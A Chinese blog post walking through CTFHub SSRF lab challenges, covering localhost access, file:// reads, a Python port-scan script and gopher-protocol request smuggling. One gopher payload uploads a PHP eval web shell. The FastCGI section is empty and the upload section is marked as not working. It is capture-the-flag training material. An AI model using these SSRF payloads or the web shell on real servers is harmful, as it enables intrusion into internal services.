CTFHUB---SSRF
SSRF是什么?
SSRF(Server-Side Request Forgery:服务请求伪造)是一种由攻击者构造,从而让服务端发起请求的一种安全漏洞,它将一个可以发起网络请求的服务当作跳板来攻击其他服务,SSRF的攻击目标一般是内网。
1.内网访问
构造url
http://challenge-4d3d62136e2a8980.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php
2.伪协议读取文件
http://challenge-3ccdfc8b22d98eb3.sandbox.ctfhub.com:10800/?url=file:///var/www/html/flag.php
页面源码
3.端口扫描
import requests
try:
for i in range(8000,9001):
url='http://challenge-c383792e4e5d3cbe.sandbox.ctfhub.com:10800/?url=127.0.0.1:'+str(i)
data=requests.get(url).text
if 'ctfhub' in data:
print(data)
else:
pass
except:
print('cuo')
python 端口扫描.py
4.POST请求
POST /flag.php HTTP/1.1Host: 127.0.0.1:80Content-Length: 36Content-Type: application/x-www-form-urlencodedkey=583ee4e219514f2541cacb39d9d9c20d
两次url编码
http://challenge-f042963869e9d0d9.sandbox.ctfhub.com:10800/?
url=gopher%3A//127.0.0.1%3A80/_%250D%250A
POST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250A
key%253Defb8a28f7d870d70c2cdd0d9a1e4eacf
http://challenge-f042963869e9d0d9.sandbox.ctfhub.com:10800/?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%253A80%250D%250AContent-Length%253A%252036%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250A%250D%250Akey%253Defb8a28f7d870d70c2cdd0d9a1e4eacf
速度有点慢
5.上传文件
有问题
GET /?url=_ HTTP/1.1
Host: challenge-670abe4f4308b949.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
POST%2520%252Fflag.php%2520HTTP%252F1.1%250AHost%253A%2520challenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520WOW64%253B%2520rv%253A52.0)%2520Gecko%252F20100101%2520Firefox%252F52.0%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252C*%252F*%253Bq%253D0.8%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Cen-US%253Bq%253D0.5%252Cen%253Bq%253D0.3%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250AReferer%253A%2520http%253A%252F%252Fchallenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250ADNT%253A%25201%250AConnection%253A%2520close%250AUpgrade-Insecure-Requests%253A%25201%250AContent-Type%253A%2520multipart%252Fform-data%253B%2520boundary%253D---------------------------541164717975%250AContent-Length%253A%2520330%250A%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250AContent-Type%253A%2520application%252Foctet-stream%250A%250A%253C%253Fphp%2520%2540eval(%2524_POST%255B'123'%255D)%253B%253F%253E%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250A%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250A-----------------------------541164717975--%250A
GET /?url=gopher://127.0.0.1:80/_POST%2520%252Fflag.php%2520HTTP%252F1.1%250AHost%253A%2520challenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%250AUser-Agent%253A%2520Mozilla%252F5.0%2520(Windows%2520NT%252010.0%253B%2520WOW64%253B%2520rv%253A52.0)%2520Gecko%252F20100101%2520Firefox%252F52.0%250AAccept%253A%2520text%252Fhtml%252Capplication%252Fxhtml%252Bxml%252Capplication%252Fxml%253Bq%253D0.9%252C*%252F*%253Bq%253D0.8%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Cen-US%253Bq%253D0.5%252Cen%253Bq%253D0.3%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250AReferer%253A%2520http%253A%252F%252Fchallenge-670abe4f4308b949.sandbox.ctfhub.com%253A10800%252F%253Furl%253D127.0.0.1%252Fflag.php%250ADNT%253A%25201%250AConnection%253A%2520close%250AUpgrade-Insecure-Requests%253A%25201%250AContent-Type%253A%2520multipart%252Fform-data%253B%2520boundary%253D---------------------------541164717975%250AContent-Length%253A%2520330%250A%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250AContent-Type%253A%2520application%252Foctet-stream%250A%250A%253C%253Fphp%2520%2540eval(%2524_POST%255B'123'%255D)%253B%253F%253E%250A-----------------------------541164717975%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250A%250A%25E9%258E%25BB%25E6%2584%25AA%25E6%25B0%25A6%25E9%258F%258C%25E3%2583%25A8%25EE%2587%2597%250A-----------------------------541164717975--%250A
Host: challenge-670abe4f4308b949.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
6.FastCGI协议
__EOF__

本文链接:https://www.cnblogs.com/TinKode123/p/16150258.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角【推荐】一下。您的鼓励是博主的最大动力!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 使用C#创建一个MCP客户端
· 分享一个免费、快速、无限量使用的满血 DeepSeek R1 模型,支持深度思考和联网搜索!
· ollama系列1:轻松3步本地部署deepseek,普通电脑可用
· 基于 Docker 搭建 FRP 内网穿透开源项目(很简单哒)
· 按钮权限的设计及实现